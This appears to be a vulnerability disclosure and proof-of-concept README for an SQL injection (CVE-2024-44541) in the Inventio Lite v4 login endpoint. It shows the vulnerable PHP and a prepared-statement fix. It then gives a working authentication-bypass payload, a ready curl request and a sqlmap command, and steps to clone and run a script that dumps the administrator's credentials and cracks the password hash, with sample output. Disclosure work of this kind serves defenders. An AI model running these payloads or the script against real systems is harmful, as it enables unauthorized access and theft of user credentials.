Inventio Lite v4 is vulnerable to SQL Injection (SQLi) in the /action=processlogin endpoint. This vulnerability allows attackers to inject arbitrary SQL queries via the username parameter in POST requests, potentially leading to unauthorized access and data extraction.
The vulnerable code is as follows:
if(!isset($_SESSION["user_id"])) {
$user = $_POST['username'];
$pass = sha1(md5($_POST['password']));
$base = new Database();
$con = $base->connect();
$sql = "select * from user where (email= \"".$user."\" or username= \"".$user."\") and password= \"".$pass."\" and is_active=1";
$query = $con->query($sql);
$found = false;
$userid = null;
while($r = $query->fetch_array()){
$found = true;
$userid = $r['id'];
}
}Screenshot of the Vulnerable Code:
The issue is fixed by using prepared statements:
if(!isset($_SESSION["user_id"])) {
$user = $_POST['username'];
$pass = sha1(md5($_POST['password']));
$base = new Database();
$con = $base->connect();
// Prepare the query
$stmt = $con->prepare("
SELECT * FROM user
WHERE (email = ? OR username = ?)
AND password = ?
AND is_active = 1
");
// Bind parameters
$stmt->bind_param("sss", $user, $user, $pass);
// Execute query
$stmt->execute();
// Get result
$result = $stmt->get_result();
$found = false;
$userid = null;
while($r = $result->fetch_assoc()){
$found = true;
$userid = $r['id'];
}
// Close statement
$stmt->close();
}To exploit this vulnerability, use the following payload:
user -> ") or 1=1-- -
pass -> blablalba
Example of the attack using curl:
$ curl -X POST http://192.168.1.51/inventio-lite/?action=processlogin -d 'username=%22%29%20or%201%3D1--%20-&password=blablabla' -v && echo ""$ sqlmap -u http://192.168.1.51/inventio-lite/?action=processlogin --data="username=*&password=*" --level 5 --risk 3 --dbms=mysql --dbs --prefix='")' --batch --dbsTo automate the exploitation and extraction of the administrator's username and password hash, you can use the provided Python script, sqli.py.
You can clone this repository
git clone https://github.com/pointedsec/CVE-2024-44541Then install the requirements with pip
pip install -r requirements.txtModify the following variables in the script as needed:
BASE_URL= "http://192.168.1.51/inventio-lite/"PWD_DIC_PATH= "/usr/share/wordlists/rockyou.txt"
And execute the script, this will dump the Administrator username and hash, then tries to crack the hash with the SHA1(MD5(password)) format.
Example output:
$ python3 sqli.py
[*] Checking if target is vulnerable
[+] Target Vulnerable!
[*] Dumping Administrator username...
[◤] Extracting Username: -> POINTEDSEC@GMAIL.COM
[/] Extracting Admin Password Hash: Final Admin Hash: 90b9aa7e25f80cf4f64e990b78a9fc5ebd6cecad
[+] Password Decrypted! -> POINTEDSEC@GMAIL.COM:admin
[*] Try to Log In with that username, if that doesn't work, try with some uppercase/lowercase combinationsConfidentiality: Attackers can dump the entire database, exposing sensitive data such as user credentials and personal information.
Integrity: Attackers can bypass authentication and gain administrative access, allowing them to modify or delete data.
- Inventio Lite GitHub Repository
- https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-44541
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-44541
- https://nvd.nist.gov/vuln/detail/CVE-2024-44541
This vulnerability report was identified by Andrés Del Cerro. For further details, please contact me in pointedpentesting@gmail.com